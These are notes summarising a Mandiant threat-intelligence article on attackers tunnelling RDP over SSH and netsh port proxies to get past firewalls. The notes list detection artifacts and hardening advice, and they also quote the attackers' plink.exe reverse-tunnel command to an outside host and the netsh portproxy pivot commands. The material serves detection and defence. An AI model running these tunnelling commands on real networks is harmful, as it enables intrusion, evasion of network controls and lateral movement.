Bypassing Network Restrictions Through RDP Tunneling
by: David Pany, Steve Miller, Danielle Desfosses
January 24, 2019
Mandiant
| Notes |
|---|
| RDP |
| Mandiant |
| lateral movement |
| Evasion |
| Microsoft |
| Windows |
| “Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors” |
| firewall |
| NAT |
| tunneling |
| port forwarding |
| firewall “pinholes” |
| PuTTY |
| Plink (plink.exe) |
| SSH, SSH malware |
| many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network |
| FIN8 |
| command and control |
| plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389 |
| phishing |
| foothold |
| persistence |
| Windows Network Shell (netsh) |
| jump box |
| netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport |
| netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP> |
| default RDP port: TCP 3389 |
| https://cloud.google.com/blog/topics/threat-intelligence/establishing-baseline-remote-desktop-protocol |
| recommendation: disable RDP if not needed |
| recommendation: host-based firewall to restrict access to RDP |
| recommendation: enable the “Deny log on through Remote Desktop Services” security setting |
| registry |
| HKEY_CURRENT_USER\Software\SimonTatham\PuTTY |
| HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys |
| PortProxy |
| HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 |
| Event Logs |
| %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx |
| %systemroot%\Windows\System32\winevt\Logs\Security.evtx |
| “The ‘TerminalServices-LocalSessionManager’ log contains successful interactive local or remote logon events as identified by EID 21 and successful reconnection of a previously established RDP session not terminated by a proper user logout as identified by EID 25” |
| “The ‘Security’ log contains successful Type 10 remote interactive logons (RDP) as identified by EID 4624” |
| “A source IP address recorded as a localhost IP address (127.0.0.1 – 127.255.255.255) may be indicative of a tunneled logon routed from a listening localhost port to the localhost’s RDP port TCP 3389.” |
| Application Compatibility Cache/Shimcache |
| Amcache |
| Jump Lists |
| Prefetch |
| Service Events |
| CCM Recently Used Apps |
| WMI |
| Registry key |
| recommendation: content inspection of network traffic |
| recommendation: firewall workstation to workstation traffic |
| Snort |
| RDP handshake |